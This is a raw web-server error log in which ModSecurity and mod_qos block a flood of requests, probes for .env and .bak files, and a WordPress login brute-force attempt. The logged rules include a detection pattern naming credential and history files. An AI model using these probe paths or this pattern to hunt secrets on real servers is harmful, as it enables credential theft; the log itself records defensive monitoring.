[Tue May 26 19:53:48.276836 2026] [security2:error] [pid 86490:tid 86746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8lZMwN0DpLVWo6KtZAAAAQM"]
[Tue May 26 19:53:48.277772 2026] [security2:error] [pid 86490:tid 86669] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8lZMwN0DpLVWo6KtZgAAALY"]
[Tue May 26 19:53:48.294942 2026] [security2:error] [pid 86490:tid 86679] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8lZMwN0DpLVWo6KtfAAAAMA"]
[Tue May 26 19:53:48.303269 2026] [security2:error] [pid 86490:tid 86624] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8lZMwN0DpLVWo6KtegAAAIk"]
[Tue May 26 19:53:48.305847 2026] [security2:error] [pid 86490:tid 86741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8lZMwN0DpLVWo6KtfgAAAP4"]
[Tue May 26 19:53:48.313614 2026] [security2:error] [pid 93867:tid 94062] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8pCDfrjqoHpuuBKrJQAAATM"]
[Tue May 26 19:53:48.313680 2026] [security2:error] [pid 86490:tid 86707] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8lZMwN0DpLVWo6KtdgAAANw"]
[Tue May 26 19:53:48.317824 2026] [security2:error] [pid 86490:tid 86697] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8lZMwN0DpLVWo6KtkAAAANI"]
[Tue May 26 19:53:48.320434 2026] [security2:error] [pid 86490:tid 86720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8lZMwN0DpLVWo6KtaAAAAOk"]
[Tue May 26 19:53:48.324775 2026] [security2:error] [pid 86490:tid 86687] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8lZMwN0DpLVWo6KtaQAAAMg"]
[Tue May 26 19:53:48.324970 2026] [security2:error] [pid 86490:tid 86691] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8lZMwN0DpLVWo6KtiQAAAMw"]
[Tue May 26 19:53:48.330563 2026] [security2:error] [pid 86490:tid 86653] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8lZMwN0DpLVWo6KtigAAAKY"]
[Tue May 26 19:53:48.333387 2026] [security2:error] [pid 93867:tid 94128] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8pCDfrjqoHpuuBKrKQAAAVM"]
[Tue May 26 19:53:48.335763 2026] [security2:error] [pid 86490:tid 86635] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8lZMwN0DpLVWo6KtcgAAAJQ"]
[Tue May 26 19:53:48.340134 2026] [security2:error] [pid 86490:tid 86723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8lZMwN0DpLVWo6KtiAAAAOw"]
[Tue May 26 19:53:48.354092 2026] [security2:error] [pid 93868:tid 94385] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs80qK9k_ZUB2Vp25EmwAAAg4"]
[Tue May 26 19:53:48.364800 2026] [security2:error] [pid 86490:tid 86634] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8lZMwN0DpLVWo6KtfQAAAJM"]
[Tue May 26 19:53:48.365765 2026] [security2:error] [pid 86490:tid 86721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8lZMwN0DpLVWo6KtkQAAAOo"]
[Tue May 26 19:53:48.372928 2026] [security2:error] [pid 93576:tid 93738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8mDRMqfxdEDkoszLFgAAABo"]
[Tue May 26 19:53:48.389822 2026] [security2:error] [pid 86490:tid 86670] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8lZMwN0DpLVWo6KtjQAAALc"]
[Tue May 26 19:53:48.401443 2026] [security2:error] [pid 93576:tid 93804] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8mDRMqfxdEDkoszLFAAAAFw"]
[Tue May 26 19:53:48.407582 2026] [security2:error] [pid 86490:tid 86638] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs81ZMwN0DpLVWo6Kt3QAAAJc"]
[Tue May 26 19:53:48.415070 2026] [security2:error] [pid 93576:tid 93748] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8mDRMqfxdEDkoszLFwAAACQ"]
[Tue May 26 19:53:48.426002 2026] [security2:error] [pid 86490:tid 86708] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs81ZMwN0DpLVWo6Kt4gAAAN0"]
[Tue May 26 19:53:48.428166 2026] [security2:error] [pid 93576:tid 93778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs82DRMqfxdEDkoszLKwAAAEI"]
[Tue May 26 19:53:48.435041 2026] [security2:error] [pid 86490:tid 86666] [client 185.177.72.53:4966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/prometheus/.env"] [unique_id "ahWs9FZMwN0DpLVWo6KuPAAAALM"]
[Tue May 26 19:53:48.436509 2026] [security2:error] [pid 93868:tid 94285] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs80qK9k_ZUB2Vp25EnQAAAao"]
[Tue May 26 19:53:48.440816 2026] [security2:error] [pid 93576:tid 93805] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8mDRMqfxdEDkoszLGQAAAF0"]
[Tue May 26 19:53:48.446861 2026] [security2:error] [pid 93576:tid 93718] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs82DRMqfxdEDkoszLLAAAAAY"]
[Tue May 26 19:53:48.452011 2026] [security2:error] [pid 93868:tid 94270] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs80qK9k_ZUB2Vp25EnAAAAZs"]
[Tue May 26 19:53:48.454852 2026] [security2:error] [pid 93576:tid 93833] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs82DRMqfxdEDkoszLMwAAAHk"]
[Tue May 26 19:53:48.454853 2026] [security2:error] [pid 93867:tid 94108] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs85CDfrjqoHpuuBKrPgAAAUk"]
[Tue May 26 19:53:48.456902 2026] [security2:error] [pid 86490:tid 86674] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs81ZMwN0DpLVWo6Kt-QAAALs"]
[Tue May 26 19:53:48.458849 2026] [security2:error] [pid 93867:tid 94178] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs85CDfrjqoHpuuBKrNwAAAWk"]
[Tue May 26 19:53:48.467450 2026] [security2:error] [pid 86490:tid 86692] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs81ZMwN0DpLVWo6Kt7wAAAM0"]
[Tue May 26 19:53:48.470476 2026] [security2:error] [pid 93576:tid 93822] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8mDRMqfxdEDkoszLHQAAAG4"]
[Tue May 26 19:53:48.595893 2026] [qos:error] [pid 93576:tid 93788] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs9GDRMqfxdEDkoszLfgAAAEw
[Tue May 26 19:53:48.601149 2026] [qos:error] [pid 86490:tid 86652] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9FZMwN0DpLVWo6KuVwAAAKU
[Tue May 26 19:53:48.602777 2026] [security2:error] [pid 86490:tid 86710] [client 185.177.72.53:4966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/spike/.env"] [unique_id "ahWs9FZMwN0DpLVWo6KuWAAAAN8"]
[Tue May 26 19:53:48.605406 2026] [qos:error] [pid 86490:tid 86670] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9FZMwN0DpLVWo6KuWgAAALc
[Tue May 26 19:53:48.605466 2026] [qos:error] [pid 93576:tid 93821] [client 45.148.10.120:35254] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWs9GDRMqfxdEDkoszLfwAAAG0
[Tue May 26 19:53:48.607820 2026] [qos:error] [pid 86490:tid 86683] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9FZMwN0DpLVWo6KuWwAAAMQ
[Tue May 26 19:53:48.608615 2026] [qos:error] [pid 86490:tid 86625] [client 45.148.10.120:34904] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9FZMwN0DpLVWo6KuXAAAAIo
[Tue May 26 19:53:48.611577 2026] [qos:error] [pid 86490:tid 86639] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9FZMwN0DpLVWo6KuXQAAAJg
[Tue May 26 19:53:48.615537 2026] [qos:error] [pid 86490:tid 86745] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9FZMwN0DpLVWo6KuXgAAAQI
[Tue May 26 19:53:48.617419 2026] [qos:error] [pid 93576:tid 93793] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9GDRMqfxdEDkoszLgAAAAFE
[Tue May 26 19:53:48.621916 2026] [qos:error] [pid 93576:tid 93829] [client 45.148.10.120:35246] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9GDRMqfxdEDkoszLgQAAAHU
[Tue May 26 19:53:48.687369 2026] [security2:error] [pid 93576:tid 93708] [remote 91.227.122.219:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.122.227.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWs9GDRMqfxdEDkoszLZQAAc30"]
[Tue May 26 19:53:48.748848 2026] [qos:error] [pid 93576:tid 93792] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9GDRMqfxdEDkoszLggAAAFA
[Tue May 26 19:53:48.753195 2026] [qos:error] [pid 86490:tid 86633] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9FZMwN0DpLVWo6KuXwAAAJI
[Tue May 26 19:53:48.754170 2026] [qos:error] [pid 93576:tid 93743] [client 45.148.10.120:35254] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9GDRMqfxdEDkoszLgwAAAB8
[Tue May 26 19:53:48.758573 2026] [qos:error] [pid 86490:tid 86642] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9FZMwN0DpLVWo6KuYAAAAJs
[Tue May 26 19:53:48.760027 2026] [qos:error] [pid 86490:tid 86694] [client 45.148.10.120:34904] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9FZMwN0DpLVWo6KuYQAAAM8
[Tue May 26 19:53:48.762431 2026] [qos:error] [pid 86490:tid 86638] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9FZMwN0DpLVWo6KuYgAAAJc
[Tue May 26 19:53:48.762439 2026] [qos:error] [pid 86490:tid 86718] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWs9FZMwN0DpLVWo6KuYwAAAOc
[Tue May 26 19:53:48.765527 2026] [qos:error] [pid 93576:tid 93815] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9GDRMqfxdEDkoszLhAAAAGc
[Tue May 26 19:53:48.772665 2026] [qos:error] [pid 86490:tid 86647] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9FZMwN0DpLVWo6KuZQAAAKA
[Tue May 26 19:53:48.773590 2026] [qos:error] [pid 93576:tid 93721] [client 45.148.10.120:35246] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9GDRMqfxdEDkoszLhQAAAAk
[Tue May 26 19:53:48.901253 2026] [qos:error] [pid 93576:tid 93755] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9GDRMqfxdEDkoszLhgAAACs
[Tue May 26 19:53:48.902801 2026] [qos:error] [pid 86490:tid 86719] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9FZMwN0DpLVWo6KuaAAAAOg
[Tue May 26 19:53:48.903181 2026] [qos:error] [pid 93576:tid 93824] [client 45.148.10.120:35254] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9GDRMqfxdEDkoszLhwAAAHA
[Tue May 26 19:53:48.910130 2026] [qos:error] [pid 86490:tid 86678] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9FZMwN0DpLVWo6KuaQAAAL8
[Tue May 26 19:53:48.911350 2026] [qos:error] [pid 86490:tid 86665] [client 45.148.10.120:34904] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9FZMwN0DpLVWo6KuagAAALI
[Tue May 26 19:53:48.915033 2026] [qos:error] [pid 93576:tid 93832] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9GDRMqfxdEDkoszLiAAAAHg
[Tue May 26 19:53:48.916709 2026] [qos:error] [pid 86490:tid 86743] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9FZMwN0DpLVWo6KuawAAAQA
[Tue May 26 19:53:48.918403 2026] [qos:error] [pid 86490:tid 86643] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9FZMwN0DpLVWo6KubAAAAJw
[Tue May 26 19:53:48.927439 2026] [qos:error] [pid 93576:tid 93835] [client 45.148.10.120:35246] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9GDRMqfxdEDkoszLiQAAAHs
[Tue May 26 19:53:48.930304 2026] [qos:error] [pid 86490:tid 86666] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9FZMwN0DpLVWo6KubQAAALM
[Tue May 26 19:53:48.941060 2026] [security2:error] [pid 86490:tid 86644] [client 185.177.72.53:4966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/site.bak"] [unique_id "ahWs9FZMwN0DpLVWo6KubgAAAJ0"]
[Tue May 26 19:53:49.055340 2026] [qos:error] [pid 86490:tid 86747] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9VZMwN0DpLVWo6KucQAAAQQ
[Tue May 26 19:53:49.055794 2026] [qos:error] [pid 93576:tid 93717] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9WDRMqfxdEDkoszLiwAAAAU
[Tue May 26 19:53:49.057513 2026] [qos:error] [pid 93576:tid 93761] [client 45.148.10.120:35254] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9WDRMqfxdEDkoszLjAAAADE
[Tue May 26 19:53:49.061746 2026] [qos:error] [pid 86490:tid 86622] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9VZMwN0DpLVWo6KucgAAAIc
[Tue May 26 19:53:49.062507 2026] [qos:error] [pid 93576:tid 93763] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9WDRMqfxdEDkoszLjQAAADM
[Tue May 26 19:53:49.067142 2026] [qos:error] [pid 86490:tid 86726] [client 45.148.10.120:34904] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9VZMwN0DpLVWo6KucwAAAO8
[Tue May 26 19:53:49.067867 2026] [qos:error] [pid 86490:tid 86621] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9VZMwN0DpLVWo6KudAAAAIY
[Tue May 26 19:53:49.072959 2026] [qos:error] [pid 86490:tid 86660] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9VZMwN0DpLVWo6KudQAAAK0
[Tue May 26 19:53:49.079174 2026] [qos:error] [pid 93576:tid 93780] [client 45.148.10.120:35246] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9WDRMqfxdEDkoszLjgAAAEQ
[Tue May 26 19:53:49.095402 2026] [qos:error] [pid 86490:tid 86691] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9VZMwN0DpLVWo6KudgAAAMw
[Tue May 26 19:53:49.284420 2026] [security2:error] [pid 93867:tid 94200] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs85CDfrjqoHpuuBKrOAAAAXM"]
[Tue May 26 19:53:49.284979 2026] [security2:error] [pid 93867:tid 94169] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs85CDfrjqoHpuuBKrPAAAAWU"]
[Tue May 26 19:53:49.287107 2026] [security2:error] [pid 93867:tid 94127] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs85CDfrjqoHpuuBKrOQAAAVI"]
[Tue May 26 19:53:49.288951 2026] [security2:error] [pid 93576:tid 93720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs82DRMqfxdEDkoszLMgAAAAg"]
[Tue May 26 19:53:49.289168 2026] [security2:error] [pid 86490:tid 86695] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs81ZMwN0DpLVWo6Kt7QAAANA"]
